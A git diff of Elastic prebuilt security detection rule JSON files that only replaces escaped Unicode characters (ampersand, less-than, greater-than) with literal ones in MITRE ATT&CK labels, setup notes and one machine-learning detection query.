diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json
index 0bc31588de8..c092ac1650e 100644
--- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json
index 38984f0fe62..61b18046803 100644
--- a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json
index 84e5dae0ce1..6713e5a7156 100644
--- a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json
index d2e3f8ebbc7..74311d15b52 100644
--- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json
index df82b05b863..2e2c0293a84 100644
--- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json
index 2d04209a553..d7da84504f1 100644
--- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json
index 2d80649bfd1..5b0051c0a03 100644
--- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -99,7 +99,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json
index 9ede8bec11d..ae9e79997c5 100644
--- a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score",
 "note": "",
- "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability \u003e 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n",
+ "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n",
 "references": [
 "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html",
 "https://docs.elastic.co/en/integrations/problemchild",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json
index 06b5b0c3743..37ae3e7ad37 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json
index 1412faa657a..79fa2f6a630 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json
index a412674cf38..7efd22525dd 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json
index 717b7fabcb3..3dab9688b65 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json
index 7c5dccf6aec..9781b84af5b 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json
index b410bd1ccca..7e6b9ab97d6 100644
--- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9960432d-9b26-409f-972b-839a959e79e2",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json
index 743296e563f..8655a0b691c 100644
--- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json
index 1ba30115b6e..69ecdb6aac1 100644
--- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json
index fd6b24b1c0a..460459b73d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json
@@ -44,7 +44,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json b/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json
index 31776691a9d..75f164bc958 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json
index 6b697d8613b..e22d793d35e 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json
index 35fa8b39ba4..ecd6f1e43d6 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json
index 5dc109ee848..8b620b9ca95 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json
index 6191d4e92cc..d0d1c5862ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json
index 80ee361a862..8c153c58da2 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json
index 70dce9764c7..ec7333a0a6e 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json
index ecfbcb58697..4fc14bed037 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json
index a5d87374b6b..7f4bf96e61a 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json
index 763df516a98..345cb8302b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json
index 32477373a06..b0ee58dabce 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -133,7 +133,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json
index 41d8c073c4e..4192fe03f44 100644
--- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json
@@ -59,7 +59,7 @@
 ],
